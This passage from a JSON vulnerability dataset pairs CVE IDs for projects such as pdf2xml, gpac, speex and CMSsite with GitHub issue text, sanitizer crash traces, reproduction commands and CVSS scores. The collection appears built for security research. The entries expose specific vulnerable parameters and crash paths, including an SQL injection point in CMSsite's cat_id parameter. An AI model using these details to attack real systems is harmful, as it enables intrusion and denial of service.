PATHTAG (gdb NUMBERTAG i $rip NUMBERTAG e NUMBERTAG b APITAG NUMBERTAG mo NUMBERTAG fc(%rcx),%esi NUMBERTAG e2a1 APITAG NUMBERTAG mov %esi NUMBERTAG rb NUMBERTAG e2a7 APITAG NUMBERTAG callq NUMBERTAG fa0 APITAG NUMBERTAG e2ac APITAG NUMBERTAG mo NUMBERTAG rbx),%rdi NUMBERTAG e2b3 APITAG NUMBERTAG lea NUMBERTAG rdi),%r NUMBERTAG e2b7 APITAG NUMBERTAG mov %r NUMBERTAG rb NUMBERTAG e2be APITAG NUMBERTAG mo NUMBERTAG rdi),%r NUMBERTAG e2c2 APITAG NUMBERTAG lea NUMBERTAG r9),%r NUMBERTAG e2c9 APITAG NUMBERTAG mov %r NUMBERTAG rb NUMBERTAG e2d0 APITAG NUMBERTAG add NUMBERTAG fc,%r9 (gdb) p/x $rc NUMBERTAG ref: URLTAG",
  56520. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  56521. "severity": "HIGH",
  56522. "baseScore": 7.5,
  56523. "impactScore": 3.6,
  56524. "exploitabilityScore": 3.9
  56525. },
  56526. {
  56527. "CVE_ID": "CVE-2020-23873",
  56528. "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/11",
  56529. "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/11",
  56530. "Repo_new": "kermitt2/pdf2xml",
  56531. "Issue_Created_At": "2020-07-06T01:58:25Z",
  56532. "description": "Heap buffer overflow APITAG dump. $ ./pdf2xml FILETAG test.xml APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a at pc NUMBERTAG fb7e NUMBERTAG d9f5 bp NUMBERTAG ffc8a9d8c NUMBERTAG sp NUMBERTAG ffc8a9d NUMBERTAG f0 WRITE of size NUMBERTAG at NUMBERTAG a thread T NUMBERTAG fb7e NUMBERTAG d9f4 in __interceptor_vsprintf ( PATHTAG NUMBERTAG fb7e NUMBERTAG dcc9 in __interceptor_sprintf ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG int) PATHTAG NUMBERTAG ec5 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG a in APITAG , double, double, int, int, int, int, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG e in APITAG , double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG d in APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG de8 in APITAG , APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG b in main PATHTAG NUMBERTAG fb7e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG a is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG ref: URLTAG",
  56533. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56534. "severity": "CRITICAL",
  56535. "baseScore": 9.8,
  56536. "impactScore": 5.9,
  56537. "exploitabilityScore": 3.9
  56538. },
  56539. {
  56540. "CVE_ID": "CVE-2020-23874",
  56541. "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/12",
  56542. "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/12",
  56543. "Repo_new": "kermitt2/pdf2xml",
  56544. "Issue_Created_At": "2020-07-06T02:02:32Z",
  56545. "description": "Heap buffer overflow APITAG $ ./pdf2xml FILETAG FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a at pc NUMBERTAG f NUMBERTAG e NUMBERTAG f5 bp NUMBERTAG fffaa6b NUMBERTAG sp NUMBERTAG fffaa6b2da0 WRITE of size NUMBERTAG at NUMBERTAG a thread T NUMBERTAG f NUMBERTAG e NUMBERTAG f4 in __interceptor_vsprintf ( PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG cc9 in __interceptor_sprintf ( PATHTAG NUMBERTAG e3d in APITAG , APITAG , double&, double&, double&, double&, double&, double&) PATHTAG NUMBERTAG c7c in APITAG int) PATHTAG NUMBERTAG ec5 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG a in APITAG , double, double, int, int, int, int, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG e in APITAG , double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG d in APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG de8 in APITAG , APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG b in main PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG a is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG ref: URLTAG",
  56546. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56547. "severity": "CRITICAL",
  56548. "baseScore": 9.8,
  56549. "impactScore": 5.9,
  56550. "exploitabilityScore": 3.9
  56551. },
  56552. {
  56553. "CVE_ID": "CVE-2020-23876",
  56554. "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/14",
  56555. "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/14",
  56556. "Repo_new": "kermitt2/pdf2xml",
  56557. "Issue_Created_At": "2020-07-06T03:02:05Z",
  56558. "description": "Memory leaks APITAG APITAG $ ./pdf2xml NUMBERTAG Memory FILETAG test.xml APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG d2f NUMBERTAG PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG a9 in APITAG , double, double, double, double) PATHTAG NUMBERTAG d in APITAG int) PATHTAG NUMBERTAG ec5 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e in APITAG , double, double, int, int, int, int, int ( )(void ), void ) PATHTAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG a6c in APITAG int) PATHTAG NUMBERTAG ec5 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e in APITAG , double, double, int, int, int, int, int ( )(void ), void ) PATHTAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG e NUMBERTAG f in strdup ( PATHTAG NUMBERTAG a NUMBERTAG in APITAG , int, int, int, int, double, double, int, APITAG , double, int, int) PATHTAG NUMBERTAG fc in APITAG , double, double) PATHTAG NUMBERTAG c9 in APITAG , double, double, double, double, unsigned int, int, unsigned int , int) PATHTAG NUMBERTAG in APITAG , double, double, double, double, double, double, unsigned int, int, unsigned int , int) PATHTAG NUMBERTAG b1 in APITAG ) PATHTAG ref: URLTAG FILETAG",
  56559. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  56560. "severity": "HIGH",
  56561. "baseScore": 7.5,
  56562. "impactScore": 3.6,
  56563. "exploitabilityScore": 3.9
  56564. },
  56565. {
  56566. "CVE_ID": "CVE-2020-23877",
  56567. "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/15",
  56568. "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/15",
  56569. "Repo_new": "kermitt2/pdf2xml",
  56570. "Issue_Created_At": "2020-07-06T03:05:26Z",
  56571. "description": "Stack buffer overflow APITAG APITAG $ gdb ./pdf2xml (gdb) r FILETAG test.xml FILETAG",
  56572. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56573. "severity": "CRITICAL",
  56574. "baseScore": 9.8,
  56575. "impactScore": 5.9,
  56576. "exploitabilityScore": 3.9
  56577. },
  56578. {
  56579. "CVE_ID": "CVE-2020-23878",
  56580. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/45",
  56581. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/45",
  56582. "Repo_new": "flexpaper/pdf2json",
  56583. "Issue_Created_At": "2020-07-09T09:56:14Z",
  56584. "description": "Stack buffer overflow APITAG fetch. $ ./pdf2json FILETAG ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffc9d6bcfe0 (pc NUMBERTAG f2cf5cba NUMBERTAG e bp NUMBERTAG sp NUMBERTAG ffc9d6bcfd0 T NUMBERTAG f2cf5cba NUMBERTAG d ( PATHTAG NUMBERTAG f2cf5cb9d NUMBERTAG PATHTAG NUMBERTAG f2cf5c2cf4f ( PATHTAG NUMBERTAG f2cf5ca NUMBERTAG fe in operator new(unsigned long) ( PATHTAG NUMBERTAG c4 in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , int) PATHTAG NUMBERTAG d6 in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , int) PATHTAG NUMBERTAG d6 in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , int) PATHTAG NUMBERTAG d6 in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , int) PATHTAG ref: URLTAG FILETAG",
  56585. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56586. "severity": "CRITICAL",
  56587. "baseScore": 9.8,
  56588. "impactScore": 5.9,
  56589. "exploitabilityScore": 3.9
  56590. },
  56591. {
  56592. "CVE_ID": "CVE-2020-23879",
  56593. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/44",
  56594. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/44",
  56595. "Repo_new": "flexpaper/pdf2json",
  56596. "Issue_Created_At": "2020-07-09T09:51:29Z",
  56597. "description": "NULL pointer dereference APITAG APITAG $ ./pdf2json FILETAG Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG bp NUMBERTAG ffe1f9cf NUMBERTAG sp NUMBERTAG ffe1f9cf5b8 T NUMBERTAG f5f in APITAG int, Object ) PATHTAG NUMBERTAG ec in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , Object ) PATHTAG NUMBERTAG in APITAG ) PATHTAG NUMBERTAG fe0 in APITAG , APITAG ) PATHTAG NUMBERTAG b in APITAG , APITAG , APITAG , void ) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fd2eaec NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG int, Object NUMBERTAG ABORTING ref: URLTAG FILETAG",
  56598. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  56599. "severity": "HIGH",
  56600. "baseScore": 7.5,
  56601. "impactScore": 3.6,
  56602. "exploitabilityScore": 3.9
  56603. },
  56604. {
  56605. "CVE_ID": "CVE-2020-23884",
  56606. "Issue_Url_old": "https://github.com/nomacs/nomacs/issues/516",
  56607. "Issue_Url_new": "https://github.com/nomacs/nomacs/issues/516",
  56608. "Repo_new": "nomacs/nomacs",
  56609. "Issue_Created_At": "2020-07-09T11:28:59Z",
  56610. "description": "Open a malformed mng format file, buffer overflow and memory corruption will occur.. Two issues were found in nomacs in all versions. nomacs does not handle the mng file format very well. When nomacs opens a carefully constructed mng file, nomacs will have a buffer overflow and crash NUMBERTAG buffer overflow APITAG APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ea NUMBERTAG eb NUMBERTAG ec NUMBERTAG ffffc NUMBERTAG ed NUMBERTAG d NUMBERTAG esi NUMBERTAG fd NUMBERTAG edi NUMBERTAG d NUMBERTAG eip NUMBERTAG edc NUMBERTAG b esp NUMBERTAG a7f NUMBERTAG ebp NUMBERTAG iopl NUMBERTAG nv up ei pl nz na pe nc cs NUMBERTAG b ss NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG b gs NUMBERTAG efl NUMBERTAG ERROR: Symbol file could not be found. Defaulted to export symbols for PATHTAG qmng NUMBERTAG b NUMBERTAG edc NUMBERTAG b f3ab rep stos dword ptr es:[edi NUMBERTAG exploitable v !exploitable NUMBERTAG APITAG Executing Processor Architecture is NUMBERTAG Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address NUMBERTAG d NUMBERTAG First Chance Exception Type: STATUS_ACCESS_VIOLATION APITAG Exception Sub Type: Write Access Violation Faulting Instruction NUMBERTAG edc NUMBERTAG b rep stos dword ptr es:[edi] Exception Hash APITAG APITAG Hash Usage : Stack Trace: APITAG : qmng NUMBERTAG b Instruction Address NUMBERTAG edc NUMBERTAG b Description: User Mode Write AV Short Description: APITAG Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable User Mode Write AV starting at qmng NUMBERTAG b APITAG User mode write access violations that are not near NULL are exploitable. APITAG NUMBERTAG memory corruption APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ea NUMBERTAG e8e1 eb NUMBERTAG ec NUMBERTAG ed NUMBERTAG esi NUMBERTAG edi NUMBERTAG eip NUMBERTAG edbd NUMBERTAG esp NUMBERTAG aef3c4 ebp NUMBERTAG a NUMBERTAG iopl NUMBERTAG nv up ei ng nz na po cy cs NUMBERTAG b ss NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG b gs NUMBERTAG efl NUMBERTAG ERROR: Symbol file could not be found. Defaulted to export symbols for PATHTAG qmng NUMBERTAG d NUMBERTAG edbd NUMBERTAG e mov byte ptr [esi],cl ds NUMBERTAG exploitable v !exploitable NUMBERTAG APITAG Executing Processor Architecture is NUMBERTAG Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address NUMBERTAG First Chance Exception Type: STATUS_ACCESS_VIOLATION APITAG Exception Sub Type: Write Access Violation Faulting Instruction NUMBERTAG edbd NUMBERTAG mov byte ptr [esi],cl Basic Block NUMBERTAG edbd NUMBERTAG mov byte ptr [esi],cl Tainted Input operands: 'cl','esi NUMBERTAG edbd NUMBERTAG movzx ecx,byte ptr [ea NUMBERTAG edbd NUMBERTAG a mov byte ptr [esi NUMBERTAG cl NUMBERTAG edbd NUMBERTAG d movzx ecx,byte ptr [ea NUMBERTAG edbd NUMBERTAG mov byte ptr [esi NUMBERTAG cl NUMBERTAG edbd NUMBERTAG movzx ecx,byte ptr [ea NUMBERTAG edbd NUMBERTAG mov byte ptr [esi NUMBERTAG cl NUMBERTAG edbd NUMBERTAG b mov ecx,dword ptr [ebp NUMBERTAG h NUMBERTAG edbd NUMBERTAG add edx,ec NUMBERTAG edbd NUMBERTAG add ea NUMBERTAG edbd NUMBERTAG lea esi,[esi+ec NUMBERTAG edbd NUMBERTAG cmp edx,dword ptr [ebp NUMBERTAG h NUMBERTAG edbd NUMBERTAG f jl qmng NUMBERTAG d NUMBERTAG edbd NUMBERTAG Exception Hash APITAG APITAG Hash Usage : Stack Trace: APITAG : qmng NUMBERTAG d NUMBERTAG APITAG : qmng NUMBERTAG d Instruction Address NUMBERTAG edbd NUMBERTAG Description: User Mode Write AV near NULL Short Description: APITAG Exploitability Classification: UNKNOWN Recommended Bug Title: User Mode Write AV near NULL starting at qmng NUMBERTAG d NUMBERTAG APITAG User mode write access violations that are near NULL are unknown.",
  56611. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56612. "severity": "MEDIUM",
  56613. "baseScore": 5.5,
  56614. "impactScore": 3.6,
  56615. "exploitabilityScore": 1.8
  56616. },
  56617. {
  56618. "CVE_ID": "CVE-2020-23903",
  56619. "Issue_Url_old": "https://github.com/xiph/speex/issues/13",
  56620. "Issue_Url_new": "https://github.com/xiph/speex/issues/13",
  56621. "Repo_new": "xiph/speex",
  56622. "Issue_Created_At": "2020-07-13T04:52:03Z",
  56623. "description": "speexenc encode wav file dos vulnerability. when speexenc encode wav file , deal with channels NUMBERTAG will generate a Division by zero error which will cause the software crash FILETAG usage : speexenc sample vulnerability function: static int read_samples(FILE fin,int frame_size, int bits, int channels, int lsb, short input, char buff, spx_int NUMBERTAG t size) { unsigned char in[MAX_FRAME_BYTES NUMBERTAG int i; short s; int nb_read; size_t to_read; if (size && size NUMBERTAG return NUMBERTAG to_read = bits NUMBERTAG channels frame_size;",
  56624. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56625. "severity": "MEDIUM",
  56626. "baseScore": 5.5,
  56627. "impactScore": 3.6,
  56628. "exploitabilityScore": 1.8
  56629. },
  56630. {
  56631. "CVE_ID": "CVE-2020-23904",
  56632. "Issue_Url_old": "https://github.com/xiph/speex/issues/14",
  56633. "Issue_Url_new": "https://github.com/xiph/speex/issues/14",
  56634. "Repo_new": "xiph/speex",
  56635. "Issue_Created_At": "2020-07-14T03:07:21Z",
  56636. "description": "speexenc stack buffer overflow . I have found a stack buffer overflow vulnerability in speexenc,this may cause a rce by open a crafted wav file FILETAG the vulnerability function: APITAG } else { nb_read = fread(in NUMBERTAG to_read,fin);",
  56637. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56638. "severity": "MEDIUM",
  56639. "baseScore": 5.5,
  56640. "impactScore": 3.6,
  56641. "exploitabilityScore": 1.8
  56642. },
  56643. {
  56644. "CVE_ID": "CVE-2020-23907",
  56645. "Issue_Url_old": "https://github.com/avast/retdec/issues/637",
  56646. "Issue_Url_new": "https://github.com/avast/retdec/issues/637",
  56647. "Repo_new": "avast/retdec",
  56648. "Issue_Created_At": "2019-09-04T12:18:20Z",
  56649. "description": "Bug in bin2llvmir Decoder. I try to translate the following PE file: FILETAG But in the decoder phase, the retdec just gets an error and exits: APITAG The problem is in file APITAG , function ERRORTAG , line NUMBERTAG and line NUMBERTAG two portions of code: CODETAG The problem here is, if up equals to APITAG , the APITAG will crash, the possible fix is: CODETAG After this fix, the Decoder works well: APITAG",
  56650. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56651. "severity": "CRITICAL",
  56652. "baseScore": 9.8,
  56653. "impactScore": 5.9,
  56654. "exploitabilityScore": 3.9
  56655. },
  56656. {
  56657. "CVE_ID": "CVE-2020-23912",
  56658. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/540",
  56659. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/540",
  56660. "Repo_new": "axiomatic-systems/bento4",
  56661. "Issue_Created_At": "2020-08-01T02:45:57Z",
  56662. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), mp NUMBERTAG aac (latest master NUMBERTAG b NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG PATHTAG o /dev/null Output APITAG APITAG output ERRORTAG POC FILETAG",
  56663. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56664. "severity": "MEDIUM",
  56665. "baseScore": 5.5,
  56666. "impactScore": 3.6,
  56667. "exploitabilityScore": 1.8
  56668. },
  56669. {
  56670. "CVE_ID": "CVE-2020-23914",
  56671. "Issue_Url_old": "https://github.com/yhirose/cpp-peglib/issues/121",
  56672. "Issue_Url_new": "https://github.com/yhirose/cpp-peglib/issues/121",
  56673. "Repo_new": "yhirose/cpp-peglib",
  56674. "Issue_Created_At": "2020-08-07T10:34:08Z",
  56675. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), peglint (latest master NUMBERTAG f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG ast opt APITAG PATHTAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  56676. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56677. "severity": "MEDIUM",
  56678. "baseScore": 5.5,
  56679. "impactScore": 3.6,
  56680. "exploitabilityScore": 1.8
  56681. },
  56682. {
  56683. "CVE_ID": "CVE-2020-23915",
  56684. "Issue_Url_old": "https://github.com/yhirose/cpp-peglib/issues/122",
  56685. "Issue_Url_new": "https://github.com/yhirose/cpp-peglib/issues/122",
  56686. "Repo_new": "yhirose/cpp-peglib",
  56687. "Issue_Created_At": "2020-08-07T11:41:48Z",
  56688. "description": "A heap overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), peglint (latest master NUMBERTAG f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG ast opt ./heap overflow resolve_escape_sequence peglib NUMBERTAG PATHTAG APITAG output ERRORTAG POC FILETAG",
  56689. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56690. "severity": "MEDIUM",
  56691. "baseScore": 5.5,
  56692. "impactScore": 3.6,
  56693. "exploitabilityScore": 1.8
  56694. },
  56695. {
  56696. "CVE_ID": "CVE-2020-23921",
  56697. "Issue_Url_old": "https://github.com/Samuel-Tyler/fast_ber/issues/30",
  56698. "Issue_Url_new": "https://github.com/samuel-tyler/fast_ber/issues/30",
  56699. "Repo_new": "samuel-tyler/fast_ber",
  56700. "Issue_Created_At": "2020-08-07T12:52:04Z",
  56701. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc, fast_ber_compiler (latest master NUMBERTAG b5 URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG APITAG /tmp/fastber APITAG output ERRORTAG POC FILETAG",
  56702. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  56703. "severity": "HIGH",
  56704. "baseScore": 7.1,
  56705. "impactScore": 5.2,
  56706. "exploitabilityScore": 1.8
  56707. },
  56708. {
  56709. "CVE_ID": "CVE-2020-23928",
  56710. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1568",
  56711. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1568",
  56712. "Repo_new": "gpac/gpac",
  56713. "Issue_Created_At": "2020-08-07T04:41:36Z",
  56714. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  56715. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  56716. "severity": "HIGH",
  56717. "baseScore": 7.1,
  56718. "impactScore": 5.2,
  56719. "exploitabilityScore": 1.8
  56720. },
  56721. {
  56722. "CVE_ID": "CVE-2020-23928",
  56723. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1569",
  56724. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1569",
  56725. "Repo_new": "gpac/gpac",
  56726. "Issue_Created_At": "2020-08-07T14:53:11Z",
  56727. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  56728. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  56729. "severity": "HIGH",
  56730. "baseScore": 7.1,
  56731. "impactScore": 5.2,
  56732. "exploitabilityScore": 1.8
  56733. },
  56734. {
  56735. "CVE_ID": "CVE-2020-23930",
  56736. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1565",
  56737. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1565",
  56738. "Repo_new": "gpac/gpac",
  56739. "Issue_Created_At": "2020-08-07T02:28:14Z",
  56740. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG dxml NUMBERTAG d diod latm keep utc out /dev/null APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  56741. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56742. "severity": "MEDIUM",
  56743. "baseScore": 5.5,
  56744. "impactScore": 3.6,
  56745. "exploitabilityScore": 1.8
  56746. },
  56747. {
  56748. "CVE_ID": "CVE-2020-23931",
  56749. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1567",
  56750. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1567",
  56751. "Repo_new": "gpac/gpac",
  56752. "Issue_Created_At": "2020-08-07T04:38:51Z",
  56753. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  56754. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  56755. "severity": "HIGH",
  56756. "baseScore": 7.1,
  56757. "impactScore": 5.2,
  56758. "exploitabilityScore": 1.8
  56759. },
  56760. {
  56761. "CVE_ID": "CVE-2020-23931",
  56762. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1564",
  56763. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1564",
  56764. "Repo_new": "gpac/gpac",
  56765. "Issue_Created_At": "2020-08-07T01:48:18Z",
  56766. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address ldl\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  56767. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  56768. "severity": "HIGH",
  56769. "baseScore": 7.1,
  56770. "impactScore": 5.2,
  56771. "exploitabilityScore": 1.8
  56772. },
  56773. {
  56774. "CVE_ID": "CVE-2020-23932",
  56775. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1566",
  56776. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1566",
  56777. "Repo_new": "gpac/gpac",
  56778. "Issue_Created_At": "2020-08-07T03:10:20Z",
  56779. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG sdp ttxt NUMBERTAG dump chap ogg dump cover drtp bt out /dev/null APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  56780. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56781. "severity": "MEDIUM",
  56782. "baseScore": 5.5,
  56783. "impactScore": 3.6,
  56784. "exploitabilityScore": 1.8
  56785. },
  56786. {
  56787. "CVE_ID": "CVE-2020-23945",
  56788. "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/14",
  56789. "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/14",
  56790. "Repo_new": "victoralagwu/cmssite",
  56791. "Issue_Created_At": "2020-07-07T07:45:05Z",
  56792. "description": "SQL Injection in FILETAG form. Hello, I found that there is a sql injection vulnerability in the cat_id parameter of the FILETAG file on the website. Entering single quotes in this parameter will cause the webpage to burst and the database statement to burst. And this parameter can be used by sqlmap to obtain data information in the database. FILETAG FILETAG",
  56793. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  56794. "severity": "HIGH",
  56795. "baseScore": 7.5,
  56796. "impactScore": 3.6,
  56797. "exploitabilityScore": 3.9
  56798. },
  56799. {
  56800. "CVE_ID": "CVE-2020-23962",
